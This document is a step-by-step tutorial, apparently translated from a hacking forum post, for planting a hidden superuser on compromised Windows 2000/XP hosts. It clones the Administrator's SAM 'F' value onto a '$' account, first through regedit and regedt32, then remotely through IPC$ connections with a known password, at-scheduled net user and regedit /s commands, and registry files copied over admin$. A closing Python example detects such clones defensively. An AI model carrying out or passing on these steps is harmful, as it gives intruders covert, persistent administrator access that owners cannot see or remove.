1. How to create a hidden superuser through the graphical interface
The graphical-interface method applies to compromised hosts that you can reach locally or through Terminal Services on port 3389. The author I mentioned had a good idea, but his method relies on psu.exe (a program that runs another program under the System account, and which you would first have to upload). In my opinion psu.exe is not needed, because Windows 2000 has two registry editors, regedit.exe and regedt32.exe (in XP they are actually one program, and you can right-click a key and choose "Permissions" to change its permissions). regedt32.exe can set permissions on registry keys: grant yourself "Full Control" on the SAM key and you can then read and write the information under the SAM key. The steps are as follows:
1. Assume we have logged on to the compromised host through Terminal Services as the superuser Administrator. First create an account named hacker$ from the command line or in the account manager; here I create it from the command line:
net user hacker$ 1234 /add
2. Enter regedt32.exe in "Start/Run" to start regedt32.exe.
3. Select the HKEY_LOCAL_MACHINE\SAM\SAM key and click "Permissions"; a window pops up. Click Add to add the account you logged on with to the security list. Here I logged on as Administrator, so I add Administrator and set its permission to "Full Control". Note: it is best to add the account you are logged on with, or the group it belongs to; do not modify the existing accounts or groups, or a series of unnecessary problems may follow. The added account is deleted again at the end.
4. Then click "Start", click "Run", and enter regedit.exe to start the Registry Editor. Open the key:
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\hacker$
5. Export the keys hacker$, 00000409 and 000001F4 as hacker.reg, 409.reg and 1f4.reg. Edit the exported files in Notepad: copy the value of "F" under 000001F4 (the superuser's key) over the value of "F" under 00000409 (the key corresponding to hacker$), then merge 409.reg into hacker.reg.
6. On the command line, delete the user hacker$:
net user hacker$ /del
7. In the regedit.exe window press F5 to refresh, then choose File > Import Registry File and import the modified hacker.reg into the registry.
8. The hidden superuser hacker$ has now been created. Close regedit.exe. In the regedt32.exe window, restore the original permissions on the HKEY_LOCAL_MACHINE\SAM\SAM key (you only need to delete the Administrator account you added).
9. Note: after the hidden superuser is created, hacker$ cannot be seen in the account manager, nor in the output of "net user" on the command line, but its password can no longer be changed. If you use the net user command to change the password of hacker$, the hidden superuser becomes visible in the account manager and cannot be deleted.
2. How to remotely create a hidden superuser from the command line
Here we use at.exe, because tasks scheduled with at run under the System account, so the psu.exe program is not needed. This method works as long as the Schedule service can be started.
For the command-line method you can connect in various ways, such as using sqlexec to connect to MSSQL on port 1433, or using the Telnet service; as long as you can get a shell, you can run the at command.
1. First find a compromised host; how to find one is not the topic here. Assume we have found one whose superuser Administrator has the password 12345678. Now we can remotely create a hidden superuser for this superuser from the command line. (In this example the host is a host on my LAN; I changed its IP address to 13.50.97.238. Do not go after this address on the Internet, so as not to disturb the normal owner of that IP address.)
2. First establish a connection with the compromised host. The command is:
net use \\13.50.97.238\ipc$ "12345678" /user:"Administrator"
3. Create a user on the host with the at command (if the at service is not started, use netsvc.exe or Xiaoyi's sc.exe to start it remotely):
at \\13.50.97.238 c:\winnt\system32\net.exe user hacker$ 1234 /add
The user name ends in $ because a user name with $ appended is not shown by net user on the command line, although it can still be seen in the account manager.
4. Use the at command to export the key HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users:
at \\13.50.97.238 :55 c:\winnt\regedit.exe /e hacker.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users
/e is a parameter of regedit.exe, and the key HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users must be written out in full. If necessary, put "c:\winnt\regedit.exe /e hacker.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users" in quotation marks.
5. Download hacker.reg from the host to the local machine and edit it in Notepad. The command:
copy \\13.50.97.238\admin$\system32\hacker.reg c:\hacker.reg
How to edit it was already described in the graphical-interface section, so I will not repeat it here.
6. Copy the edited hacker.reg back to the host:
copy c:\hacker.reg \\13.50.97.238\admin$\system32\hacker1.reg
7. Check the host's time with net time \\13.50.97.238, then run the at command to delete the user hacker$:
at \\13.50.97.238 13:40 net user hacker$ /del
8. Verify that hacker$ has been deleted. Use
net use \\13.50.97.238 /del
to disconnect from the host, then
net use \\13.50.97.238\ipc$ "1234" /user:"hacker$"
to connect to the host as hacker$. If the connection fails, the account has been deleted.
9. Re-establish the connection with net use \\13.50.97.238\ipc$ "12345678" /user:"Administrator", get the host's time again, and run the at command to import hacker1.reg (already copied back in step 6) into the host's registry:
at \\13.50.97.238 13:41 c:\winnt\regedit.exe /s hacker1.reg
The /s parameter of regedit.exe means silent mode.
10. Verify that hacker$ has been created; the method is the same as for verifying that hacker$ was deleted.
11. Verify whether hacker$ has read, write and delete permissions. If you are still not at ease, you can also verify whether it can create other accounts.
12. From step 11 we can conclude that the user hacker$ has superuser permissions: when I created it with the at command it was an ordinary user, but now it can read, write and delete data remotely.
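A defender-side check for the technique described in both sections (pasting the superuser's "F" value under a second account's RID key): the following added example, which is not code from the original post, parses a .reg export of HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users and flags any user key whose F value embeds a RID that does not match the key name. It assumes the RID is stored as a little-endian DWORD at offset 0x30 of F (the commonly documented SAM user F layout); the sample export, and the names parse_reg_users, find_cloned_accounts, make_f and to_reg_hex, are all constructed here.

```python
import re, struct

# Offset of the account RID (little-endian DWORD) inside a SAM user "F" value (assumed layout).
RID_OFFSET = 0x30

def parse_reg_users(reg_text):
    """Return {key: F bytes} for each Users\\<hex RID> key in a .reg export."""
    users, current, buf = {}, None, None
    for raw in reg_text.splitlines():
        line = raw.strip()
        m = re.match(r'\[.*\\Users\\([0-9A-Fa-f]{8})\]$', line)
        if m:
            current, buf = m.group(1).upper(), None
            continue
        if buf is None:                      # not inside a multi-line hex value
            if not (current and line.startswith('"F"=hex:')):
                continue
            line = line[len('"F"=hex:'):]
        buf = (buf or '') + line.rstrip('\\')
        if not line.endswith('\\'):          # last line of the value
            users[current] = bytes.fromhex(buf.replace(',', ''))
            buf = None
    return users

def find_cloned_accounts(users):
    """Return (key, embedded RID) for each key whose F value carries a different RID."""
    findings = []
    for key, f in sorted(users.items()):
        if len(f) >= RID_OFFSET + 4:
            embedded = struct.unpack_from('<I', f, RID_OFFSET)[0]
            if embedded != int(key, 16):
                findings.append((key, embedded))
    return findings

def make_f(rid):
    """Constructed minimal F value: 80 zero bytes with only the RID field filled in."""
    f = bytearray(0x50)
    struct.pack_into('<I', f, RID_OFFSET, rid)
    return bytes(f)

def to_reg_hex(data, per_line=25):
    """Format bytes as regedit exports them: comma-separated, wrapped with a trailing backslash."""
    rows = [','.join(f'{b:02x}' for b in data[i:i + per_line])
            for i in range(0, len(data), per_line)]
    return ',\\\n  '.join(rows)

# Constructed export: key 00000409 (hacker$) has had the F value of 000001F4 pasted in.
SAMPLE_REG = "Windows Registry Editor Version 5.00\n\n" + "".join(
    f'[HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\{key}]\n"F"=hex:{to_reg_hex(make_f(rid))}\n\n'
    for key, rid in (("000001F4", 0x1F4), ("00000409", 0x1F4), ("000003E9", 0x3E9)))
```

Running find_cloned_accounts(parse_reg_users(SAMPLE_REG)) reports only the 00000409 key, whose F value claims RID 500; on a real export the same mismatch is the signature of this clone.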